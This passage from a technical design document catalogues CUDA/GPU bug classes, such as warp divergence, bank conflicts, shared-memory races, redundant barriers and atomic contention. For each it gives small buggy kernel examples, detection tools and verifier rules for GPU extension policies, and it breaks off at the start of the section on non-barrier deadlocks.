GPUDrano: "detects uncoalesced global memory accesses" and treats them as performance bugs.(GitHub, CAV17)
GKLEE: reports "non-coalesced memory accesses" as performance bugs it finds.(Lingming Zhang)
GPUCheck: detects "non-coalesceable memory accesses."(WebDocs)

Checking approach

Static analysis (GPUDrano/GPUCheck-style): analyze address expressions in terms of lane-to-address stride; flag when stride exceeds coalescing thresholds.(CAV17)
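
The effect of lane-to-address stride can be made concrete by counting how many aligned memory segments one warp-wide access touches. The C++ sketch below is a host-side model, not the analysis used by GPUDrano or GPUCheck. It assumes 32 lanes, a segment-aligned base address, and a 128-byte segment size chosen for illustration (actual transaction granularity is architecture-dependent); segments_touched is a hypothetical name.

```cpp
#include <cassert>
#include <cstddef>
#include <set>

// Number of distinct aligned segments touched when each of 32 lanes accesses
// one element of `elem_bytes` bytes at index lane * stride, starting from a
// segment-aligned base. The 128-byte default is an illustrative assumption.
std::size_t segments_touched(std::size_t stride,
                             std::size_t elem_bytes = 4,
                             std::size_t segment_bytes = 128) {
  assert(elem_bytes > 0 && segment_bytes >= elem_bytes);
  assert(segment_bytes % elem_bytes == 0);  // elements never straddle segments
  std::set<std::size_t> segments;
  for (std::size_t lane = 0; lane < 32; ++lane) {
    segments.insert(lane * stride * elem_bytes / segment_bytes);
  }
  return segments.size();
}
```

Under these assumptions, 4-byte accesses with stride 1 fall into a single segment, stride 2 into two, and stride 32 into 32 separate segments, one per lane. A static check in this spirit would flag an index expression once its segment count exceeds a chosen threshold.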

Verification strategy

If you want "performance as correctness," this is a flagship rule: restrict policy memory ops to patterns provably coalesced (e.g., affine, lane-linear indexing with small stride), and/or require warp-level aggregation so only one lane performs global updates. Require map operations to use warp-uniform keys or contiguous per-lane indices (e.g., base + lane_id), not random hashes. If policies must do random accesses, restrict them to lane0 only, amortizing the uncoalesced behavior to 1 lane/warp.

Verification scope analysis

Scope & Assurance: Extension-local (E) for policy-owned memory; Combined (C) for kernel arrays. Static-sound for policy memory: affine/lane-linear indexing guarantees coalescing with strong soundness but low completeness (random-access patterns rejected; kernel-array reads require Combined analysis).

Production guarantee: For policy-owned memory (maps, ringbuffers), restricting index expressions to affine/lane-linear forms (base + lane_id) or lane0-only access provides bounded overhead guarantees. Warp-level aggregation (only lane0 performs global updates) amortizes uncoalesced behavior to 1 lane/warp. The verifier cannot guarantee coalescing for kernel-array reads without kernel knowledge.

Offline/CI tools: GPUDrano statically detects uncoalesced global memory accesses and treats them as performance bugs; GPUCheck identifies non-coalesceable access patterns via thread-divergent expression analysis; GKLEE reports "non-coalesced memory accesses" as performance bugs via symbolic exploration.

Residual gap: True coalescing depends on hardware cache behavior and concurrent workloads, and whether an access pattern is actually slow (and how slow) is architecture-dependent. Static analysis therefore provides structural guarantees and warnings, not tight performance bounds.

6) Control-Flow Divergence (warp branch divergence) [Performance, GPU-specific]

What it is / why it matters

SIMT divergence serializes paths within a warp, lowering "branch efficiency" and increasing worst-case overhead. This entry focuses on divergence as a performance issue. However, divergence is also the root cause of more severe correctness bugs: barrier divergence (deadlock when barriers are in conditional code) and warp-divergence races (unexpected concurrency patterns leading to data races).

Bug example

__global__ void k(float* out, float* in) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  if ((tid & 1) == 0) out[tid] = in[tid] * 2;
  else                out[tid] = in[tid] * 3;  // divergence within warp
}

Seen in / checked by

GPUCheck explicitly targets "branch divergence" as a performance problem arising from thread-divergent expressions.(WebDocs)
GKLEE: "divergent warps" as performance bugs.(Lingming Zhang)
Wu et al.: "non-optimal implementation" includes performance loss causes like branch divergence.(arXiv)

Checking approach

Static taint + symbolic reasoning (GPUCheck-style): identify conditions dependent on thread/lane id, and prove whether divergence is possible.(WebDocs)

Verification strategy

Divergence is the core reason you can treat performance as correctness. Enforce warp-uniform control flow for policies (or at least for any code path that triggers side effects / heavy helpers). If you can't prove uniformity, force "single-lane execution" of policy side effects (others become no-ops) to prevent warp amplification. Put a hard cap on the number of helper calls on any path, to bound the "divergence amplification factor."

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Control-flow divergence is determined entirely by the policy's branch conditions and their dependence on thread IDs, providing strong soundness via taint analysis but low completeness (data-dependent branches that happen to be uniform at runtime are rejected).

Production guarantee: The verifier tracks which values depend on threadIdx/laneId (taint analysis). Branches on tainted values are either forbidden or force single-lane execution for side effects (others become no-ops). This bounds the "warp amplification factor" and prevents SIMT-amplified performance degradation.
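
A taint analysis of this kind can be sketched over a tiny expression tree. The following C++ example uses a hypothetical, minimal IR (Expr, leaf, binop, may_diverge are all illustrative names, not part of bpftime or GPUCheck) and does not model memory loads or helper return values. It marks an expression as possibly divergent when any leaf is a thread or lane index.

```cpp
#include <cassert>
#include <memory>

// Hypothetical, minimal expression IR for policy branch conditions.
struct Expr {
  enum Kind { Constant, KernelArg, BlockIdx, ThreadIdx, LaneId, BinaryOp };
  Kind kind;
  std::shared_ptr<Expr> lhs;  // only set for BinaryOp
  std::shared_ptr<Expr> rhs;  // only set for BinaryOp
};
using ExprPtr = std::shared_ptr<Expr>;

ExprPtr leaf(Expr::Kind kind) {
  assert(kind != Expr::BinaryOp);
  return std::make_shared<Expr>(Expr{kind, nullptr, nullptr});
}

ExprPtr binop(ExprPtr lhs, ExprPtr rhs) {
  assert(lhs && rhs);
  return std::make_shared<Expr>(Expr{Expr::BinaryOp, lhs, rhs});
}

// Conservative taint: the value may differ between lanes of a warp if any
// leaf is a thread or lane index.
bool may_diverge(const Expr& e) {
  switch (e.kind) {
    case Expr::ThreadIdx:
    case Expr::LaneId:
      return true;
    case Expr::BinaryOp:
      return may_diverge(*e.lhs) || may_diverge(*e.rhs);
    default:
      return false;  // constants, kernel arguments, blockIdx: warp-uniform
  }
}
```

The analysis is deliberately conservative: an expression such as threadIdx.x * 0 is flagged even though its value is uniform, which is the low-completeness side of the trade-off described above.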

Offline/CI tools: GPUCheck explicitly targets "branch divergence" as a performance problem via thread-divergent expression analysis; GKLEE reports "divergent warps" as performance bugs via symbolic exploration.

Residual gap: Some safe data-dependent branches will be rejected. The gpu_ext design principle lists warp-uniform control flow as a load-time verification requirement: treating divergence as a correctness property (bounded overhead), not just optimization. For kernel-level divergence analysis, use GPUCheck or GKLEE.

7) Shared-Memory Bank Conflicts [Performance, GPU-specific]

What it is / why it matters

Bank conflicts are a shared-memory–specific performance pathology: accesses serialize when multiple lanes hit the same bank.

Bug example

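__global__ void k(int* out) {
  __shared__ int s[32*32];
  int lane = threadIdx.x & 31;
  // initialize shared memory before reading it
  for (int i = threadIdx.x; i < 32*32; i += blockDim.x) s[i] = i;
  __syncthreads();
  // stride-32 indexing maps every lane to the same bank (illustrative, assuming 32 banks)
  int x = s[lane * 32];
  out[threadIdx.x] = x;
}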

Seen in / checked by

GKLEE explicitly lists "memory bank conflicts" among detected performance bugs.(Peng Li's Homepage)

Checking approach

Static heuristic: classify shared-memory index expressions by lane stride and bank mapping; warn if likely conflict.

Verification strategy

If policies use shared scratchpads (e.g., per-block staging), enforce a conflict-free access pattern (e.g., contiguous per-lane indexing such as base + threadIdx.x). A static heuristic can classify shared-memory index expressions by lane stride and bank mapping, rejecting or warning on patterns likely to cause conflicts. Shared memory should not be banned entirely for this performance issue—it remains useful for legitimate policy scratchpads.
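
The lane-stride classification can be sketched as a small host-side calculation. The C++ example below assumes 32 lanes, 32 banks, and 4-byte words mapped to banks by word index modulo 32; these values are illustrative and should be checked against the target architecture. bank_conflict_degree is a hypothetical name, and the model treats lanes that read the same word as a conflict-free broadcast.

```cpp
#include <algorithm>
#include <array>
#include <cassert>
#include <cstddef>
#include <set>

// Lane i accesses word index i * stride_words. Returns the largest number of
// distinct words that map to one bank, i.e. how many serialized passes the
// warp-wide access needs in this model (1 means conflict-free).
std::size_t bank_conflict_degree(std::size_t stride_words) {
  const std::size_t kLanes = 32;
  const std::size_t kBanks = 32;  // assumption: 32 banks of 4-byte words
  std::array<std::set<std::size_t>, 32> words_in_bank;
  for (std::size_t lane = 0; lane < kLanes; ++lane) {
    const std::size_t word = lane * stride_words;
    words_in_bank[word % kBanks].insert(word);
  }
  std::size_t degree = 0;
  for (const auto& words : words_in_bank) {
    degree = std::max(degree, words.size());
  }
  return degree;
}

// Usage: contiguous per-lane indexing is conflict-free, stride-32 indexing
// (as in the bug example) serializes all 32 lanes.
void check_bank_examples() {
  assert(bank_conflict_degree(1) == 1u);
  assert(bank_conflict_degree(32) == 32u);
}
```

A verifier heuristic in this style could accept index expressions whose degree is 1 and reject or warn on anything higher.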

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-heuristic. Enforcing conflict-free access patterns on shared memory eliminates most bank conflicts while still allowing policies to use shared scratchpads for legitimate purposes.

Production guarantee: Policies using shared memory are restricted to conflict-free index patterns (base + threadIdx.x for contiguous access). The verifier statically checks shared-memory index expressions and rejects patterns with likely bank conflicts (e.g., stride-32 access). This preserves shared memory availability for per-block staging and aggregation.

Offline/CI tools: GKLEE explicitly lists "memory bank conflicts" among detected performance bugs via symbolic exploration.

Residual gap: Some safe but complex index patterns may be conservatively rejected. Kernel-level bank conflict analysis requires GPUDrano-style static tools or profiling. Policies needing non-trivial shared-memory access patterns may need to demonstrate conflict-freedom through annotations or simplified indexing.

8) Block-Size Dependence [Correctness, GPU-specific]

What it is / why it matters

Block-size independence is essential for safe block-size tuning. Kernels that implicitly depend on specific blockDim values can produce incorrect results or races when launched with different configurations. This is critical for auto-tuning and portability across GPU generations. This entry focuses on compile-time hardcoded assumptions within the kernel code itself (e.g., fixed shared memory sizes, hardcoded reduction strides), distinct from runtime launch configuration assumptions about grid dimensions.

Bug example

__global__ void reduce(float* out, float* in) {
  __shared__ float s[256];
  int tid = threadIdx.x;
  s[tid] = in[blockIdx.x * blockDim.x + tid];  // OOB shared-memory write if blockDim.x > 256
  __syncthreads();
  // Hardcoded reduction assumes exactly 256 threads
  if (tid < 128) s[tid] += s[tid + 128];  // reads uninitialized s[] entries if blockDim.x < 256
  __syncthreads();
  if (tid < 64) s[tid] += s[tid + 64];
  // ... continues with warp-level reduction ...
  if (tid == 0) out[blockIdx.x] = s[0];
}
// Launched with blockDim.x != 256 => wrong results or crash

Seen in / checked by

GPUDrano explicitly includes "block-size independence" analysis.(GitHub)

Checking approach

Static analysis (GPUDrano): analyze kernel code for implicit blockDim dependencies.
Require explicit declaration of block-size assumptions in kernel metadata.

Verification strategy

Policies should not implicitly assume block shapes unless the verifier can guarantee them. If a policy depends on block-level structure, require declaring it (metadata) and validate at attach time. Add verifier rules that forbid hard-coded assumptions about blockDim unless explicitly declared.

Verification scope analysis

Scope & Assurance: Extension-local (E) if the policy is block-agnostic; Combined (C) if it assumes a particular blockDim. Policies that depend on blockDim get contract-based assurance: conditional soundness (sound if the declared requirements match the actual launch config) with high completeness (policies can declare requirements; undeclared policies are assumed block-agnostic).

Production guarantee: Two approaches enable verification: (A) Block-agnostic design: policies use only lane-local or warp-level logic, avoiding blockDim dependencies entirely, making them safe for any launch config; (B) Contract-based: policies declare block-size requirements in metadata, and the runtime validates at attach time. The verifier rejects policies with hardcoded block-size constants unless explicitly declared.

Offline/CI tools: GPUDrano explicitly includes "block-size independence" analysis for detecting implicit blockDim dependencies in kernel code.

Residual gap: Policies with undeclared blockDim dependencies may fail silently with different launch configs. The contract approach shifts responsibility to policy authors to declare requirements correctly. Recommended design: make policy APIs block-agnostic (use relative indices, not absolute sizes).

9) Launch Config Assumptions [Correctness, GPU-specific]

What it is / why it matters

Many CUDA kernels assume certain launch configurations (e.g., single block, specific grid dimensions). Violating these assumptions leads to incorrect results or races that are hard to diagnose. This entry focuses on runtime launch configuration assumptions (gridDim, number of blocks), distinct from compile-time hardcoded block-size dependencies within the kernel code.

Bug example

__global__ void reduce(float* out, float* in, int n) {
  __shared__ float s[256];
  int tid = threadIdx.x;
  int i = blockIdx.x * blockDim.x + tid;
  s[tid] = (i < n) ? in[i] : 0.0f;
  __syncthreads();
  for (int stride = blockDim.x / 2; stride > 0; stride >>= 1) {
    if (tid < stride) s[tid] += s[tid + stride];
    __syncthreads();
  }
  if (tid == 0) {
    *out = s[0];  // BUG: assumes gridDim.x == 1, writes final result directly
  }              // if gridDim.x > 1, multiple blocks race on *out
}
// Called with <<<N/256, 256>>> where N >= 512 (so gridDim.x > 1) => data race, wrong result

Seen in / checked by

Wu et al.'s discussion of detected bugs includes developer responses that kernels "should not be called with more than one block" and suggests adding assertions like assert(gridDim.x == 1).(arXiv)

Checking approach

Contract checking: encode launch preconditions (gridDim, blockDim assumptions) and enforce them at runtime or statically.
Add runtime assertions for grid/block dimension assumptions.

Verification strategy

If policy code assumes a particular block/warp mapping (e.g., keys use threadIdx.x directly), you can end up with correctness or performance regressions when kernels run under different launch configs. If a policy depends on warp- or block-level structure, require declaring it (metadata) and validate at attach time.

Verification scope analysis

Scope & Assurance: Combined (C): launch configuration is host-determined, not visible to policy verifier. Contract-based assurance: conditional soundness (sound only if contracts are correctly specified and validated) with completeness depending on contract expressiveness.

Production guarantee: This bug class fundamentally requires contracts: Extension-local verification cannot see launch parameters. The policy declares preconditions (e.g., "requires gridDim.x == 1" or "requires blockDim.x >= 128"), and the runtime validates at attach/launch time. Policies without explicit requirements are assumed to work with any config.

Offline/CI tools: Wu et al.'s empirical study found real bugs where developers noted kernels "should not be called with more than one block": they suggest adding runtime assertions like assert(gridDim.x == 1). Convert such requirements into contract metadata for policy verification.

Residual gap: Contract-based verification shifts responsibility to policy authors to declare requirements correctly. This is one of the few bug classes where Combined verification is unavoidable, but contracts provide a clean interface without requiring complex joint analysis of kernel + policy.
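
The contract idea can be sketched as a small attach-time check. The struct and field names below (`LaunchContract`, `LaunchConfig`, `check_launch`) are hypothetical and only illustrate the shape of such metadata; a real runtime would read the launch dimensions from its own launch interception layer.

```cpp
#include <cassert>
#include <string>

// Hypothetical metadata a policy could declare. 0 means "no requirement".
struct LaunchContract {
    unsigned required_grid_x = 0;  // e.g. 1 for "single block only"
    unsigned min_block_x = 0;      // e.g. 128
    unsigned max_block_x = 0;      // e.g. 256 for a fixed s[256] buffer
};

// The launch configuration observed by the runtime (x dimension only).
struct LaunchConfig {
    unsigned grid_x;
    unsigned block_x;
};

// Returns an empty string if the launch satisfies the contract, otherwise
// a human-readable reason for rejecting the attach or launch.
std::string check_launch(const LaunchContract& c, const LaunchConfig& l) {
    if (c.required_grid_x != 0 && l.grid_x != c.required_grid_x)
        return "gridDim.x does not match the declared requirement";
    if (c.min_block_x != 0 && l.block_x < c.min_block_x)
        return "blockDim.x is below the declared minimum";
    if (c.max_block_x != 0 && l.block_x > c.max_block_x)
        return "blockDim.x is above the declared maximum";
    return "";
}
```

A default-constructed contract accepts every launch, which matches the rule that policies without explicit requirements are assumed to work with any config.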

10) Missing Volatile/Fence [Correctness, GPU-specific]

What it is / why it matters

GPU code often relies on compiler and memory-model subtleties. GKLEE reports a real-world category: forgetting to mark a shared memory variable as volatile, producing stale reads/writes due to compiler optimization or caching behavior. This is a GPU-flavored instance of memory visibility/ordering bugs that can be hard to reproduce.(Lingming Zhang)

Bug example

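__shared__ int flag;                  // BUG: not volatile, and no fence around the accesses
int tid = threadIdx.x;
if (tid == 0) flag = 0;
__syncthreads();                      // every thread now agrees that flag == 0
if (tid == 32) flag = 1;              // a lane in warp 1 publishes the flag
if (tid < 32) while (flag == 0) { }   // warp 0 may spin forever if the compiler keeps flag in a register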

Seen in / checked by

GKLEE explicitly lists "forgot volatile" as a discovered bug type.(Lingming Zhang)
Simulee and other tools' race detection can surface some of these issues when they manifest as data races.(zhangyuqun.github.io)

Checking approach

Symbolic exploration (GKLEE-style): explore memory access orderings and detect stale read scenarios.(Lingming Zhang)
Pattern-based linting: flag spin-wait loops on shared memory without volatile or fence.

Verification strategy

Avoid exposing raw shared/global memory communication to policies; instead provide helpers with explicit semantics (e.g., "atomic increment" or "write once" patterns), and verify policies don't implement ad-hoc synchronization loops. Forbid spin-waiting on shared memory in policy code.

Verification scope analysis

Scope & Assurance: Extension-local (E), By-construction. Banning spin-wait loops and raw shared/global memory communication eliminates volatile/fence bugs entirely, providing perfect soundness with high completeness (legitimate polling patterns are rare in policy code).

Production guarantee: The verifier bans spin-wait loops (while(flag == 0)), flag polling patterns, and raw shared/global memory communication. All inter-thread communication must go through atomic helpers with explicit semantics (e.g., "atomic increment" or "write once" patterns). This eliminates volatile/fence bugs by forbidding the patterns that cause them.

Offline/CI tools: GKLEE explicitly lists "forgot volatile" as a discovered bug type via symbolic exploration. Simulee and other race detectors can surface these issues when they manifest as data races.

Residual gap: ITS (Independent Thread Scheduling) changes assumptions about warp-lockstep execution, making traditional volatile assumptions unreliable: code that worked on pre-Volta architectures may race on newer GPUs. The safest approach is to ban ad-hoc synchronization entirely rather than trying to verify memory model subtleties.

11) Shared-Memory Data Races (`__shared__`) [Correctness, GPU-specific]

What it is / why it matters

Threads in a block access on-chip shared memory concurrently; missing/incorrect synchronization causes races. This is a classic CUDA bug class (AuCS/Wu).

Bug example

__global__ void k(int* g) {
  __shared__ int s;
  int t = threadIdx.x;
  if (t == 0) s = 1;
  if (t == 1) s = 2;   // write-write race on s
  __syncthreads();
  g[t] = s;
}

Seen in / checked by

GPUVerify explicitly targets data-race freedom and defines intra-group / inter-group races.(Nathan Chong)
GKLEE reports finding races (and related deadlocks) via symbolic exploration.(Lingming Zhang)
Simulee detects data race bugs in real projects and uses a CUDA-aware notion of race.(zhangyuqun.github.io)
Wu et al. classify data race under "improper synchronization" as a CUDA-specific root cause.(arXiv)
Compute Sanitizer racecheck is a runtime shared-memory hazard detector.(Shinhwei)

Checking approach

Static verifier route (GPUVerify-style): enforce "race-free under SIMT" by proving that any two potentially concurrent lanes/threads cannot perform conflicting accesses without proper synchronization.(Nathan Chong)
Dynamic route (Simulee-style): instrument / simulate memory accesses and flag conflicting pairs; good for bug-finding and regression tests.(zhangyuqun.github.io)
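
A rough host-side sketch of the dynamic route: log every shared-memory access together with the barrier interval it falls in, then flag conflicting pairs. This is a simplified model written for illustration, not how Simulee or any other tool is implemented; the `Access` record and function names are assumptions, and the model presumes all threads pass the same sequence of block-wide barriers.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

// One logged shared-memory access. `epoch` counts how many block-wide
// barriers the thread had passed when it made the access.
struct Access {
    int thread;
    int address;
    int epoch;
    bool is_write;
    bool is_atomic;
};

// Two accesses conflict if they touch the same address in the same barrier
// interval, come from different threads, at least one is a write, and they
// are not both atomic.
bool conflicts(const Access& a, const Access& b) {
    return a.address == b.address && a.epoch == b.epoch &&
           a.thread != b.thread && (a.is_write || b.is_write) &&
           !(a.is_atomic && b.is_atomic);
}

// Quadratic scan over the log: fine for a sketch, too slow for real traces.
std::size_t count_races(const std::vector<Access>& log) {
    std::size_t races = 0;
    for (std::size_t i = 0; i < log.size(); ++i)
        for (std::size_t j = i + 1; j < log.size(); ++j)
            if (conflicts(log[i], log[j])) ++races;
    return races;
}
```

For the bug example above, threads 0 and 1 both write `s` before the barrier, so the log contains exactly one conflicting pair; the reads after the barrier are in a later interval and do not conflict with each other.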

Verification strategy

If policies have any shared state, require warp-uniform side effects or single-lane side effects (e.g., lane0 updates) plus explicit atomics. A conservative verifier rule is: policy code cannot write shared memory except via restricted helpers that are race-safe (e.g., per-warp aggregation).

Option A – warp-/block-uniform single-writer rules (e.g., "only lane 0 updates").
Option B – atomic-only helpers for shared objects.
Option C – per-thread/per-warp sharding (each lane updates its own slot).

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Shared-memory races depend only on the policy's access patterns and synchronization, providing strong soundness via structural restrictions (per-lane sharding or lane0-only writes eliminate races by construction) with medium completeness (complex shared-memory algorithms rejected).

Production guarantee: Three options, all Extension-local: (A) Ban shared-memory writes entirely; (B) Require per-lane sharding: each lane writes its own slot, no conflicts possible; (C) Require lane0-only writes with atomic helpers. All three approaches make races impossible by construction without requiring complex GPUVerify-style interleaving proofs.

Offline/CI tools: GPUVerify explicitly targets data-race freedom as a core verification goal and defines intra-group/inter-group races; ESBMC-GPU checks data races via bounded model checking; Compute Sanitizer racecheck is a runtime shared-memory hazard detector; Simulee detects data race bugs using CUDA-aware race definitions; Wu et al. classify data race under "improper synchronization" as a CUDA-specific root cause.

Residual gap: GPUVerify-style proofs are possible but complex for arbitrary code; structural restrictions are simpler and equally sound for policy use cases. Policies needing complex shared-memory algorithms should use ringbuffers instead, avoiding shared memory entirely.

12) Redundant Barriers (unnecessary `__syncthreads`) [Performance, GPU-specific]

What it is / why it matters

A redundant barrier is a performance-pathology class: removing the barrier does not introduce a race, so the barrier was unnecessary overhead.

Bug example

__global__ void k(int* out) {
  __shared__ int s[256];
  int t = threadIdx.x;
  s[t] = t;             // no cross-thread dependence here
  __syncthreads();      // redundant
  out[t] = s[t];
}

Seen in / checked by

Wu et al.: defines "redundant barrier function."(arXiv)
Simulee: detects redundant barrier bugs and reports numbers across projects.(zhangyuqun.github.io)
AuCS: repairs synchronization bugs, including redundant barriers.(Shinhwei)
GPURepair tooling also exists to insert/remove barriers to fix races and remove unnecessary ones.(GitHub)

Checking approach

Static/dynamic dependence analysis: determine whether any read-after-write / write-after-read across threads is protected by the barrier; if not, barrier is removable (Simulee/AuCS angle).(zhangyuqun.github.io)

Verification strategy

Since barriers are allowed in policy code (with uniform placement enforced by #1), redundant barriers become a performance concern. Use static dependence analysis to detect barriers where no cross-thread data dependence exists between the preceding writes and subsequent reads. The verifier can warn about or reject redundant barriers to enforce bounded overhead as a correctness property, ensuring policies do not introduce unnecessary synchronization cost.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-heuristic. Static dependence analysis can identify barriers that protect no cross-thread memory dependence, flagging them as redundant. This provides good detection coverage for common patterns.

Production guarantee: The verifier performs dependence analysis on barrier sites: if no read-after-write or write-after-read across threads is protected by a barrier, the barrier is flagged as redundant and rejected. Combined with the policy overhead budget, this ensures barriers are only used when structurally necessary for shared-memory coordination.

Offline/CI tools: Simulee detects redundant barriers through evolutionary simulation; Wu et al. define "redundant barrier function" as a key synchronization bug type; GPURepair uses GPUVerify as an oracle to repair data races/barrier divergence and can remove unnecessary barriers.

Residual gap: Some barriers may appear redundant in isolation but are necessary for correctness under specific scheduling scenarios. Conservative analysis may retain some unnecessary barriers; profiling tools can identify remaining optimization opportunities at the kernel level.
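
The dependence test can be sketched on the host as follows. It only looks at the accesses immediately before and after a single barrier, which is a deliberate simplification: a real analysis would consider every access between neighbouring barriers and all loop iterations. `MemOp` and `barrier_is_redundant` are hypothetical names.

```cpp
#include <cassert>
#include <vector>

// One shared-memory access performed by a given thread.
struct MemOp {
    int thread;
    int address;
    bool is_write;
};

// A barrier is treated as necessary if it orders at least one cross-thread
// dependence: same address, different threads, and at least one write
// (read-after-write, write-after-read, or write-after-write).
bool barrier_is_redundant(const std::vector<MemOp>& before,
                          const std::vector<MemOp>& after) {
    for (const MemOp& a : before)
        for (const MemOp& b : after)
            if (a.address == b.address && a.thread != b.thread &&
                (a.is_write || b.is_write))
                return false;
    return true;
}
```

In the example kernel each thread writes and then reads only its own slot `s[t]`, so no pair crosses threads and the barrier is reported as redundant. If each thread instead read its neighbour's slot, the same check would keep the barrier.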

13) Host-Device Asynchronous Data Races (API ordering bugs) [Correctness, GPU-specific]

What it is / why it matters

CUDA exposes async kernel launches/memcpy/events; host code can race with device work if synchronization is missing. This is a major real-world bug source in heterogeneous programs and is not covered by pure kernel-only verifiers.

Bug example

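int* d_data;
cudaMalloc(&d_data, N * sizeof(int));
int* h_data;
cudaMallocHost(&h_data, N * sizeof(int));    // pinned host buffer, so the copy below is truly asynchronous
kernel<<<grid, block, 0, s1>>>(d_data);     // s1 and s2 are distinct non-default streams
// missing cudaStreamSynchronize(s1) or an event dependency between s1 and s2
cudaMemcpyAsync(h_data, d_data, N * sizeof(int), cudaMemcpyDeviceToHost, s2);  // races with kernel
int first = h_data[0];                       // host reads before the copy has completed
// Note: a plain cudaMemcpy on the default stream is ordered after the kernel and would not race.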

Seen in / checked by

CuSan is an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer.(GitHub)

Checking approach

Dynamic detection (CuSan-style): instrument host-side CUDA API calls and detect ordering violations at runtime.

Verification strategy

If policies interact with host-visible buffers or involve asynchronous map copies, define a strict lifetime & ordering contract (e.g., "policy writes are only consumed after a guaranteed sync point"). For testing, integrate CuSan into CI for host-side integration tests of the runtime/loader.

Verification scope analysis

Scope & Assurance: Host+Device/System (H), Dynamic-only. These races involve host-side API calls (cudaMemcpy, kernel launch, synchronization) interacting with device execution: the policy verifier provides no soundness guarantees for this bug class (host API ordering is out of scope); completeness is N/A as this is fundamentally a host-side problem.

Production guarantee: The policy verifier cannot provide guarantees for this bug class. It can only ensure policy code doesn't introduce additional async semantics (e.g., policy writes are only visible after guaranteed sync points). Define strict lifetime & ordering contracts for policy-accessible buffers.

Offline/CI tools: CuSan is the primary tool: an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer. Integrate CuSan into CI for host-side integration tests of the runtime/loader.

Residual gap: Dynamic detection depends on test coverage: executed paths only. For production, implement runtime checks in the loader/driver for obvious violations (e.g., policy accessing freed memory, missing sync before host read). This is the H-track core tool requirement.

14) Atomic Contention [Performance, GPU-amplified]

What it is / why it matters

Heavy atomic contention is a classic "performance bug that behaves like a DoS" under massive parallelism. Even when correctness is preserved, contention on a single address can cause extreme slowdowns (orders of magnitude). With millions of threads, a single hot atomic can serialize execution and cause tail latency explosion.

Bug example

__global__ void k(int* counter) {
  // All threads atomically increment the same location => extreme contention
  atomicAdd(counter, 1);
}
// Called with <<<1000, 1024>>> => 1M threads contending on one address

Seen in / checked by

GPUAtomicContention: an open-source benchmark suite (2025) explicitly measuring atomic performance under contention and across different memory scopes (block/device/system) and access patterns.(GitHub)

Checking approach

Budget-based verification: limit atomic frequency per warp/block.
Benchmarking: use atomic contention benchmarks to calibrate safe budgets.
Static analysis: identify hot atomic targets and warn about contention risk.

Verification strategy

Treat "atomic frequency + contention risk" as a verifier-enforced budget: e.g., allow at most one global atomic per warp, or require warp-aggregated updates. For evaluation, you can reuse the open benchmark suite to calibrate "safe budgets" per GPU generation. Consider requiring warp-level reduction before global atomics, which cuts the number of global atomics by up to 32x (one per warp instead of one per lane).

Verification scope analysis

Scope & Assurance: Combined → Extension-local (C→E) via budgetization, Static-sound. Contention severity depends on both policy behavior (atomic frequency) and kernel behavior (concurrent atomics to same address), but this reduces to Extension-local by treating atomics as a budget, providing strong soundness for policy's contribution with medium completeness (high-throughput atomic patterns hit budget limits).

Production guarantee: The verifier treats "atomic frequency + contention risk" as a budget: (1) limit to N global atomics per warp per invocation; (2) require warp-aggregation (one atomic per warp instead of per-lane), which reduces the number of atomics by up to 32x by construction; (3) forbid unbounded atomic loops. The budget provides bounded-overhead guarantees for policy's contribution regardless of kernel behavior.

Offline/CI tools: GPUAtomicContention is an open-source benchmark suite (2025) explicitly measuring atomic performance under contention across different memory scopes (block/device/system) and access patterns: use it to calibrate "safe budgets" per GPU generation.

Residual gap: Total system contention depends on concurrent workloads: the verifier bounds policy's contribution, not system-wide slowdown. "Making Powerful Enemies on NVIDIA GPUs" demonstrates adversarial kernels can systematically amplify interference through shared resource contention, making tight system-wide bounds impossible to guarantee statically.
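
The arithmetic behind the budget is simple enough to write down. The sketch below assumes 32 lanes per warp and a launch in which every thread wants to update the same counter once; the function names are hypothetical and the budget rule is only one possible formulation.

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kWarpSize = 32;  // assumption: 32 lanes per warp

// Global atomics issued when every thread updates the counter itself.
constexpr std::uint64_t per_thread_atomics(std::uint64_t blocks,
                                           std::uint64_t block_size) {
    return blocks * block_size;
}

// Global atomics issued when each warp first combines its lanes' values and
// a single lane publishes the sum. A partial warp still issues one atomic.
constexpr std::uint64_t warp_aggregated_atomics(std::uint64_t blocks,
                                                std::uint64_t block_size) {
    return blocks * ((block_size + kWarpSize - 1) / kWarpSize);
}

// Hypothetical verifier rule: at most `budget` global atomics per warp
// per policy invocation.
constexpr bool within_budget(std::uint64_t atomics_per_warp,
                             std::uint64_t budget) {
    return atomics_per_warp <= budget;
}
```

For the <<<1000, 1024>>> launch in the bug example, per-thread updates issue 1,024,000 atomics on one address, while warp aggregation issues 32,000. With a budget of one atomic per warp, the per-lane version (32 atomics per warp) is rejected and the aggregated version passes.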

15) Non-Barrier Deadlocks [Safety, GPU-amplified]

What it is / why it matters

Besides barrier divergence (which is specifically about __syncthreads under divergent control flow), SIMT lockstep can create deadlocks in other patterns that are unusual on CPUs: spin-waiting, lock contention within a warp, and named-barrier misuse. Warp-specialized kernels often use named barriers or structured synchronization patterns between warps/roles (producer/consumer). Bugs include: (a) spin deadlock due to missing signals, (b) unsafe barrier reuse ("recycling") across iterations, (c) races between producers/consumers.

Bug example (spin deadlock)

__global__ void k(int* flag, int* data) {
  // Block 0 expects Block 1 to set flag, but no global sync exists
  if (blockIdx.x == 0) while (atomicAdd(flag, 0) == 0) { }  // may spin forever
  if (blockIdx.x == 1) { data[0] = 42; /* forgot to set flag */ }
}

Bug example (named-barrier misuse, sketch)

// Producer writes buffer then signals barrier B
// Consumer waits on B then reads buffer
// Bug: consumer waits on wrong barrier instance / reused incorrectly in loop

Seen in / checked by

iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.(Aditya K Kamath)
GKLEE reports finding deadlocks via symbolic exploration of GPU kernels.(Lingming Zhang)
ESBMC-GPU models and checks deadlock too.(GitHub)
WEFT verifies deadlock freedom, safe barrier recycling, and race freedom for producer-consumer synchronization (named barriers).(zhangyuqun.github.io)

Checking approach

